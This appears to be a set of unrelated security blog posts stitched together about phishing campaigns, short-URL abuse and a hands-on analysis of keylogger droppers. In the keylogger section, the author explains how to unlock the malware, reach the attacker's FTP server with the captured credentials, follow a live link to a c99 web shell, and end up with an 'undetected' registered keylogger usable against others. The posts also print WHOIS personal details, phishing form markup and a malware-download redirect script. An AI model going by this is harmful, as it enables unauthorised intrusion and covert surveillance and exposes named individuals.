Here what we identified
Phishing mail with attached HTML but faked alike pdf file.which has following link inside
multiple level of redirection used.
But OPEN DNS saved with its blacklisting database.
Open DNS provides good level of protection from fake and malware sites.
Here is information on how to use this service
We have seen security features of bit.ly and its increased use as short url service , now it been exploited to send bank phishing emails
Here is the link
with following content
Security Alert:
Dear Valued Customer
Your Account has generated an error code on our Account Maintainance Server.
As an additional security measure, you are required to follow the security link below to
avoid such occurence in the future.
Please follow the link below to resolve this problem:
this link redirect to hacked site
hxxp://75.125.175.170/~makiasan/case/site.php
then redirects with 302 code to following link hosting the phishing pages.
hxxp://pasteups.com/Help/Common%20Wealth/icici/onlineverification.do/indexx.html
Usually I used to search in Google for some malware/hack tools left by malware authors, defacers etc. I saw a website containing some executable files which looks suspicious to me. Firstly, they were in double extension like .jpg.exe and secondly presence of well-known remote shell c99.php. This file is not working on that server but it’s sure that bad guy has put other malware/hack related
files.
Now it could be either hacked website or his own site to have some stuff. I got the WHOIS information.
canonical name
aliases
addresses
64.136.20.52
Queried whois.internic.net with "dom cvak36a1.com"…
Domain Name: CVAK36A1.COM
Registrar: MELBOURNE IT, LTD. D/B/A INTERNET NAMES WORLDWIDE
Whois Server: whois.melbourneit.com
Referral URL: http://www.melbourneit.com
Name Server: NS1.SJ1.NORTHSKY.COM
Name Server: NS2.SJ1.NORTHSKY.COM
Status: ok
Updated Date: 21-may-2009
Creation Date: 21-may-2009
Expiration Date: 21-may-2010
Domain Name………. cvak36a1.com
Creation Date…….. 2009-05-21
Registration Date…. 2009-05-21
Expiry Date………. 2010-05-21
Organisation Name…. Mike Koehler
Organisation Address. 3061 County Road 220
Organisation Address.
Organisation Address. Findlay
Organisation Address. 45840
Organisation Address. OH
Organisation Address. UNITED STATES
Admin Name……….. Dung Le
Admin Address…….. ThaiNguyen VietNam
Admin Address……..
Admin Address…….. Thai Nguyen
Admin Address…….. 23999
Admin Address…….. Thai Nguyen
Admin Address…….. VIET NAM
Admin Email………. dunggttn2009@gmail.com ——>>>>>> Note this ID
Admin Phone………. +84985081369
Admin Fax…………
Tech Name………… Mike Koehler
Tech Address……… 3061 County Road 220
Tech Address………
Tech Address……… Findlay
Tech Address……… 45840
Tech Address……… OH
Tech Address……… UNITED STATES
Tech Email……….. dunggttn2009@gmail.com
Tech Phone……….. 4192993235
Tech Fax………….
Name Server………. ns1.sj1.northsky.com
Name Server………. ns2.sj1.northsky.com
By looking /analyzing some other stuff I concluded that VIET NAM guy own this website. There is also SQL injection related stuff at .
http://cvak36a1.com/3/
http://cvak36a1.com/2/
I downloaded following latest files from this site
File: anhdep.jpg.exe
Size: 298042 Bytes
MD5: 748128B6B977D352E4EC412C4E303050
File: mu.jpg.exe
Size: 247353 Bytes
MD5: 9297D8E7BB3B5E78968A9C96544E8558
My first step in analysis is to looking at the file strings as it reveals lots of information about the file in question. In the case of this file ,anhdep.jpg.exe , the strings are
!This program cannot be run in DOS mode.
Rich
.text
`.data
.rsrc ———————————–->>Resource section ( may be having other files if it is dropper kind of malware)
MSVBVM60.DLL ——————->> Presence of this DLL indicates probably this is written in VB (in 99% files)
@*\AC:\Documents and Settings\Admin\My Documents\New Folder\stub\stub.vbp –> Adding some stub to file means (a packer, binder or keylogger)
.exe
\decrypted.exe ————————>> Original file name is Intel.exe and having this decrypted.exe !!
VS_VERSION_INFO
StringFileInfo
040904B0
ProductName
intel
Signature analysis with PEiD
My local AV is dectecting this malware as “ Trojan.Dropper.WIN32.VB.acjs”. I got some clue by this name . So it is a dropper file written in VB . I executed this file in my Lab Machine . As like others malware it drops some files into TEMP directory from there it is dispalying one image file and simultaneously executing other, (decrypted.exe) keylogger server file , resulting bpk.exe and other files into system32 folder, in registry “RUN” modification, Browser Helper Objects setting for bpkwb.dll.
Image on execution
bpk.exe is well known for “Blazing tools Perfect Keylogger” software. So anhdep.jpg.exe is result of binding of Image file and keylogger file. I scanned the dropped files with the same AV and to my surprise it is not detecting any of keylogger files. This particular file is storing all information in system32/dt folder in snapshots images , means at regular interval it is taking snapshots of screen as well. It is also having some network activity i.e it is trying to reach 69.89.30.141 . So my AV is having the detection of binder tool not keylogger. I was also thinking for code analysis using VB decompiler or ollydbg however I moved to other file.
File: mu.jpg.exe
This file is not having VB signature but I found names related to same keylogger as in previous file.
inst.dat$ ———————->>>Installation Instructions
u:}T
Q"UT
YZU-MH
~EO’
=v;y
gSRk
qd{F
-t8F
mc.dat ————->> Some info (Later i found it is “ Mouse Click config “ file
bpkhk.dll ————>>Blazing Tools perfect keylooger HooK DLL file
cvk_
O}KwRl
_{cq
So this file is also dropping same keylogger but using different crypter/binder and to my surprise my AV is not detecting it at all !!
Again I executed this file in my LAB machine and found same results but different image and different configuration files (related to same keylogger) but pointing to same IP 69.89.30.141. None of the file related to keylogger is detected by my AV . This time the image is
Image
So before doing code analysis of bpk.exe or bpkhk.dll , I decided to find how user data is uploaded to remote location. You know this is very interesting part and love to see that finally I got access to remote server and fully registered Blazing tools Perfect Keylogger as well!!
Most of the keyloggers are having some configuration wizards to create remote server files. So I checked their default configuration and found hot key to show/hide program icon.
So I pressed Ctrl+Alt+L and it showed a popup for password
This password is the key of all locks.
How to crack this password ?
Crack the software or analyze network traffic to see uploading of keylogged data?
There are other options as well from code analysis to simply analysis of network traffic. Code analysis would be complex and is useful when all the keylogger configuration is embedded in same file. As in some cases they store the configuration (like password, delivery method etc) in separate files or in registry . Definitely network traffic will give useful information but not that password required to unlock this keylogger. So I decided to analyze other supporting files and in registry.
These are the registry modification
HKEY_CLASSES_ROOT\PK.IE "(Default)"
Type: REG_SZ
Data: IE Class
HKEY_CLASSES_ROOT\PK.IE\CLSID "(Default)"
Type: REG_SZ
Data: {1E1B2879-88FF-11D3-8D96-D7ACAC95951A}
HKEY_CLASSES_ROOT\PK.IE\CurVer "(Default)"
Type: REG_SZ
Data: PK.IE.1
HKEY_CLASSES_ROOT\PK.IE.1 "(Default)"
Type: REG_SZ
Data: IE Plugin Class
HKEY_CLASSES_ROOT\PK.IE.1\CLSID "(Default)"
Type: REG_SZ
Data: {1E1B2879-88FF-11D3-8D96-D7ACAC95951A}
HKEY_CLASSES_ROOT\TypeLib\{1E1B286C-88FF-11D3-8D96-D7ACAC95951A}\1.0 "(Default)"
Type: REG_SZ
Data: BPK IE Plugin Type Library
HKEY_CLASSES_ROOT\TypeLib\{1E1B286C-88FF-11D3-8D96-D7ACAC95951A}\1.0\0\win32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\system32\bpkwb.dll
HKEY_CLASSES_ROOT\TypeLib\{1E1B286C-88FF-11D3-8D96-D7ACAC95951A}\1.0\FLAGS "(Default)"
Type: REG_SZ
Data: 0
HKEY_CLASSES_ROOT\TypeLib\{1E1B286C-88FF-11D3-8D96-D7ACAC95951A}\1.0\HELPDIR "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\system32\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1E1B2879-88FF-11D3-8D96-D7ACAC95951A} "(Default)"
Type: REG_SZ
Data: PK IE Plugin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "bpk"
Type: REG_SZ
Data: C:\WINDOWS\system32\bpk.exe
and these are file modifications
Files Added:
c:\WINDOWS\system32\bpk.dat c:\WINDOWS\system32\bpk.exe
Size: 186 bytes Size: 405,504 bytes
c:\WINDOWS\system32\bpkhk.dll c:\WINDOWS\system32\bpkr.exe
Size: 24,576 bytes Size: 7,680 bytes
c:\WINDOWS\system32\bpkwb.dll c:\WINDOWS\system32\inst.dat
Size: 40,960 bytes Size: 996 bytes
c:\WINDOWS\system32\mc.dat c:\WINDOWS\system32\pk.bin
Size: 82 bytes Size: 3,944 bytes
So other than the executable files I tried to read other dat and bin files.
Look at following strings
File: mc.dat—————>>>>>>>>>>>>>>>>>>>>>>>>>> This file is having some keywords to trigger some sction !!
MD5: abe8b9f8f0419682b947c95fac3808c0
Size: 82
Ascii Strings:
—————————————————————————
con duong to lua
gunbound
dot kich
crossfire
vo lam truyen ky
kiem the
________________________________________________________________________________
File: inst.dat ———–>>>>>>>>>>>>>>>>>>>>>>>>>Best name to guess is “Instalation config.
MD5: 958302daa5e4fcd93fba2964eec66906
Size: 996
Ascii Strings:
—————————————————————————
Type folder path here or click "Next" to install to "System" folder
http://
bpk.exe
bpkr.exe
bpkhk.dll
wbpkwb.dll
pk.bin
c?wapps.dat
^?w8K
titles.dat
mc.dat
winst.dat
wkw.dat
mu.jpg
f?wB
_________________________________________________________________________________
File: bpk.dat————>>>>>>>>>>>>>>>>>>>>>>>>>>>>NO visible strings !!
MD5: 6945c380c6514e1bd2a5ee7a5813a298
Size: 664 Bytes
Ascii Strings:
—————————————————————————
___________________________________________________________________________________
File: pk.bin ———–>>>>>>>>>>>>>>>>>>>>>>>>>>>>> NO visible strings !! size ~ 4 KB
MD5: e5deabf400692fed8394bf3fdd756f2e
Size: 3944 Bytes
Ascii Strings:
—————————————————————————
Unicode Strings:
—————————————————————————
The files bpk.dat and pk.bin are not having any readable strings . So I analyzed them with hex-editor.
XOR this file with some byte, it gives some pattern that you can use to decode it fully.
I also XORed the other file pk.bin in Hex-editor.
So after doing Hex analysis of both files I found the password to unlock this keylogger installed on my Lab Machine !
Press Ctrl+Alt+L
type that password
and after OK you’ll see icon in right side in system tray. Right Click –>Options
Now you can see the delivery configuration for this particular file.
You can also view FTP server IP, where it is uploading the keylogged data with server login credential ! At the time of analysing it is still active.
While looking at the keylogged data at the server I noticed that their own machine are also infected with this keylogger ( May be for test purpose) . I got the domain name for this IP and infamous remote shell c99.php .
canonical name
aliases
addresses
69.89.30.141
Queried whois.melbourneit.com with "congtinhocvn.com"…
Domain Name………. congtinhocvn.com
Creation Date…….. 2009-06-26
Registration Date…. 2009-06-26
Expiry Date………. 2011-06-26
Organisation Name…. Steven Witt
Organisation Address. TN citi
Organisation Address.
Organisation Address. TN citi
Organisation Address. 23000
Organisation Address. TN
Organisation Address. VIET NAM
Admin Name……….. Dung Le Trung
Admin Address…….. TN citi
Admin Address……..
Admin Address…….. TN citi
Admin Address…….. 23000
Admin Address…….. TN
Admin Address…….. VIET NAM
Admin Email………. adamgravesusa@yahoo.com
Admin Phone………. 8059182572
Admin Fax…………
you can access that site using ( Use at your own risk !)
http://congtinhocvn.com/c99.php
If you want to remove infection from your machine just uncheck “Enable Logging” and now you can also create remote keylogger using this fully registered software.
But what if you want to register it manually.
Here is the solution .. registration keys are also present in above mentioned files.
So put all these files into one folder
bpk.exe
bpkhk.dll
bpkwb.dll
On execution of bpk.exe it’ll ask for the registration code . Enter the required name and code .
Now you have the fully registered , undetected Blazing Tools Perfect Keylogger . (Note the User Name)
PDF Download : http://rapidshare.com/files/345876715/HackMalware.pdf.html
– By ZinX
http://www.annysoft.com
Here is an Orkut phishing victim
this leads to following page hosted to free web service
get the user information and redirects to orkut login page , but the information goes to following guy
Most of this Phishing pages are hosted to hacked server and data are send to public domain like free email and other service.
Here is the mail that take us to the Phishing page
Here is a server hosting file on the server
this server is hacked as its using outdated software
with POC code
Last Phishing page reported on Punjab National Bank uses the “Form Buddy” service to capture the information and redirect back to original Bank site.Here is the info found in the pages.
<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post"> <input type="hidden" name="username" value="tundehsbcxxxxxx"> <input type="hidden" name="reqd" value="0"> <input type="hidden" name="url" value="http://www.pnbindia.com">
its been reported to Form Buddy.
We had couple of Phishing incident reported today here are they
hxxp://searchindiaonline.com/bank-india/ing/INGBanner.html – ING phishing
directs to
hxxp://netpnbsecuritysystem.t35.com/netpnb/ – PNB bank
site loaded by above link
We have seen how an Short url service can exploited by malware , now this can be made secure by verifying the final url against service like – stopbadware.
And we have seen in real time ,that it is effective against malware exploitation & this should be implemented in all similar service to make web experience more safe.
Short URL service has been exploited for spreading malware for an long time , here is one example
Hi! Please look at this short video. What are they doing?
tube23441.notlong.com/
following message is posted to google group , this redirects to
eusebiotanis.150m.com – this is again a freehosting page
<script> window.location.href=("hxxp://flashtubes.net/xplay.php?id=45230"); </script>
this loads following malware.
<CENTER><A href="hxxp://freefilesarchive.com/flash-HQ-plugin.45230.exe"><IMG onmouseover="window.status = 'Download Streaming Player Media please!';" alt="You must Download and Run Video Controller Object to play this video file." src="img/xplayer.gif" border=0></A> </CENTER></DIV>
Short URL – can lead to malware sites, so beware if you click one.
whois information shows
Registrant:
N/A
Farah F Jones2733 Canis Heights Drive
City Of Commerce
California,90040
With every new release there is same release of fake to steal user information. Here it is for New orkut.
user would receive spam mail with an invitation to join new orkut.
but link points to .
orkutnew.ning.com/?xgi=31XH2qxBierBjA&xg_source=msg_invite_net
site gets the user orkut profile information ,
this is site hosted to ning service with an malicious intent.
